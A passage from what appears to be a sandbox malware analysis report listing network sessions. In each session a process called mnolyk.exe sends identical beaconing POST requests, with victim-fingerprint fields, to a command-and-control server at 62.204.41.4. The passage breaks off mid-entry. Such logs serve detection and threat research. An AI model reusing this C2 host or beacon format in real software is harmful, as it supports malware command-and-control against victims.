                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            300 | 192.168.2.4 | 49995 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:55.087421894 CET | 489 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:55.153852940 CET | 489 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            301 | 192.168.2.4 | 49996 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:55.320993900 CET | 490 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:55.386444092 CET | 490 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            302 | 192.168.2.4 | 49997 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:55.560102940 CET | 491 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:55.624541044 CET | 491 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            303 | 192.168.2.4 | 49998 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:55.809592009 CET | 492 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:55.872339010 CET | 492 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:55 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            304 | 192.168.2.4 | 49999 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:56.038686037 CET | 493 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:56.108273983 CET | 493 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            305 | 192.168.2.4 | 50000 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:56.276222944 CET | 494 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:56.340622902 CET | 494 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            306 | 192.168.2.4 | 50001 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:56.508013964 CET | 495 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:56.572273970 CET | 495 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            307 | 192.168.2.4 | 50002 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:56.743695974 CET | 496 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:56.807535887 CET | 496 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:56 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            308 | 192.168.2.4 | 50003 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:56.978357077 CET | 497 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:57.047149897 CET | 497 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            309 | 192.168.2.4 | 50004 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:57.228666067 CET | 498 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:57.293574095 CET | 498 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            31 | 192.168.2.4 | 49726 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:37:33.198313951 CET | 220 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:37:33.263086081 CET | 220 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:37:33 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            310 | 192.168.2.4 | 50005 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:57.463505983 CET | 499 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:57.532308102 CET | 499 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            311 | 192.168.2.4 | 50006 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:57.717411041 CET | 500 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:57.781058073 CET | 500 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            312 | 192.168.2.4 | 50007 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:57.964843035 CET | 501 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:58.028038979 CET | 501 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:57 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            313 | 192.168.2.4 | 50008 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:58.198992014 CET | 502 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:58.265856981 CET | 502 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            314 | 192.168.2.4 | 50009 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:58.446402073 CET | 503 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:58.511236906 CET | 503 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            315 | 192.168.2.4 | 50010 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:58.684720993 CET | 504 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:58.748893023 CET | 504 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            316 | 192.168.2.4 | 50011 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:58.917493105 CET | 505 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:58.984626055 CET | 505 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:58 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            317 | 192.168.2.4 | 50012 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:59.182172060 CET | 506 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:59.249001980 CET | 506 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            318 | 192.168.2.4 | 50013 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Feb 8, 2023 17:38:59.416856050 CET | 507 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                            Content-Type: application/x-www-form-urlencoded
                            Host: 62.204.41.4
                            Content-Length: 87
                            Cache-Control: no-cache
                            Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                            Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Feb 8, 2023 17:38:59.484484911 CET | 507 | IN | HTTP/1.1 200 OK
                            Server: nginx/1.18.0 (Ubuntu)
                            Date: Wed, 08 Feb 2023 16:38:59 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                            Data Ascii: 6<c><d>0


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            319 | 192.168.2.4 | 50014 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                            Timestamp | kBytes transferred | Direction | Data
